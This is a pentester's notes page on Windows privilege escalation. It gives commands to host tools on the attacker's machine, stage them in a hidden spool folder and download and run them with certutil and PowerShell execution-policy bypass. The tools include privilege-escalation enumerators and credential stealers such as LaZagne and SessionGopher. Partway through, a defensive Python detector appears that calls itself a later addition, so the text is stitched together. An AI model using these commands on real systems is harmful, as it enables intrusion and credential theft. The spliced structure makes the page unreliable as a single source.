akde/infosec

Information security is ultimately about managing risk


Prepare your own system:

cd p151.general.1/scripts/privesc/windows
python -m SimpleHTTPServer 80

Prepare the target:

set NTPSRV=$ownIp
REM $ownIp is a placeholder for your own IP; $NTPSRV in the commands below refers to this variable (cmd.exe expands it as %NTPSRV%)
mkdir C:\Windows\System32\spool\drivers\color\wsc
cd C:\Windows\System32\spool\drivers\color\wsc

Download most scripts at once (>30 MB!):

certutil.exe -urlcache -split -f "http://$NTPSRV/7za.exe" 7za.exe
certutil.exe -urlcache -split -f "http://$NTPSRV/_ex.zip" _ex.zip
7za.exe x _ex.zip
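Added here as a defender's counterpart to the download-and-run pattern used throughout these notes (not part of the original page or of any tool listed): a small Python detector that flags certutil -urlcache downloads and PowerShell launched with the execution policy bypassed in process-creation events. The flattened log format, the user names and the 10.0.0.5 address are constructed for the example.

```python
import re

# Constructed sample process-creation events (Windows 4688 / Sysmon Event ID 1 style),
# flattened to "<timestamp> <user> <command line>". Not real telemetry; the host
# 10.0.0.5 stands in for the $NTPSRV web server from the notes above.
SAMPLE_EVENTS = [
    '2024-01-01T10:00:01 CORP\\jdoe certutil.exe -urlcache -split -f "http://10.0.0.5/winPEASx64.exe" winPEASx64.exe',
    '2024-01-01T10:00:09 CORP\\jdoe certutil.exe -urlcache -split -f "http://10.0.0.5/Powerless.bat" Powerless.bat',
    '2024-01-01T10:00:15 CORP\\jdoe powershell.exe -ExecutionPolicy Bypass -File .\\jaws-enum.ps1',
    '2024-01-01T10:00:20 CORP\\jdoe powershell -exec bypass',
    '2024-01-01T10:01:00 CORP\\svc_print C:\\Windows\\System32\\spoolsv.exe',
    '2024-01-01T10:02:00 CORP\\admin certutil.exe -verify cert.cer',
]

# certutil used as a downloader: -urlcache combined with -f and a URL argument
CERTUTIL_DOWNLOAD = re.compile(
    r'\bcertutil(?:\.exe)?\b.*-urlcache\b.*-f\s+"?(?P<url>https?://[^\s"]+)', re.I)
# PowerShell launched with the execution policy switched off (-exec, -ExecutionPolicy, -ep)
PS_BYPASS = re.compile(
    r'\bpowershell(?:\.exe)?\b.*(?:-exec(?:utionpolicy)?|-ep)\s+bypass\b', re.I)

def classify(command_line):
    """Return a list of (reason, detail) findings for a single command line."""
    findings = []
    match = CERTUTIL_DOWNLOAD.search(command_line)
    if match:
        findings.append(("certutil-download", match.group("url")))
    if PS_BYPASS.search(command_line):
        findings.append(("powershell-exec-bypass", command_line))
    return findings

def scan(lines):
    """Classify every event; return [(timestamp, user, reason, detail), ...]."""
    hits = []
    for line in lines:
        timestamp, user, command_line = line.split(" ", 2)
        for reason, detail in classify(command_line):
            hits.append((timestamp, user, reason, detail))
    return hits

def download_hosts(hits):
    """Distinct hosts certutil fetched from, for an egress block or a hunt on other endpoints."""
    return sorted({re.match(r"https?://([^/]+)", detail).group(1)
                   for _, _, reason, detail in hits if reason == "certutil-download"})

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(*hit)
    print("download hosts:", download_hosts(scan(SAMPLE_EVENTS)))
```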

WinPeas

Github

winPEAS.bat
winPEASx86.exe
winPEASx64.exe

Powerless

Github

certutil.exe -urlcache -split -f "http://$NTPSRV/Powerless.bat" Powerless.bat
Powerless.bat

Windows Exploit Suggester NG

Github (Old version for old systems)

On the victim, execute systeminfo and save its output on the local system. Then:

  1. python3 wes.py --update
  2. python3 wes.py /tmp/systeminfo

WinPWN

Github

  1. Update the repo first:
    cd /opt/WinPwn && git pull && python -m SimpleHTTPServer 80
  2. On the target:
    certutil.exe -urlcache -split -f "http://$NTPSRV/Offline_WinPwn.ps1" Offline_WinPwn.ps1
  3. Execute:
    powershell -exec bypass
    Import-Module .\Offline_WinPwn.ps1
    WinPwn

    or
    powershell.exe -ExecutionPolicy ByPass -command "& { Import-Module .\Offline_WinPwn.ps1; WinPwn }"

Sherlock

Github

JAWS

Github

certutil.exe -urlcache -split -f "http://$NTPSRV/jaws-enum.ps1" jaws-enum.ps1
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1

PowerSploit / PowerUp

See the blog post for it.

If PowerShell is not available, use SharpUp.

BeRoot

Github

certutil.exe -urlcache -split -f "http://$NTPSRV/beRoot.exe" beRoot.exe
beRoot.exe

Seatbelt

certutil.exe -urlcache -split -f "http://$NTPSRV/seatbelt.exe" seatbelt.exe

See the Seatbelt post for more details.

FullPowers

Github

Works only for the local service or network service accounts (*\local service or *\network service in the whoami output). Opens a new shell with the full set of service privileges enabled.

certutil.exe -urlcache -split -f "http://$NTPSRV/FullPowers.exe" FullPowers.exe
FullPowers.exe

Retrieving credentials

LaZagne

Github

Retrieves many credentials from various software.

certutil.exe -urlcache -split -f "http://$NTPSRV/laZagne.exe" laZagne.exe
laZagne.exe all

SessionGopher

Github

certutil.exe -urlcache -split -f "http://$NTPSRV/SessionGopher.ps1" SessionGopher.ps1
powershell.exe -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "& { . .\SessionGopher.ps1; Invoke-SessionGopher -Thorough }"

Older scripts for older systems
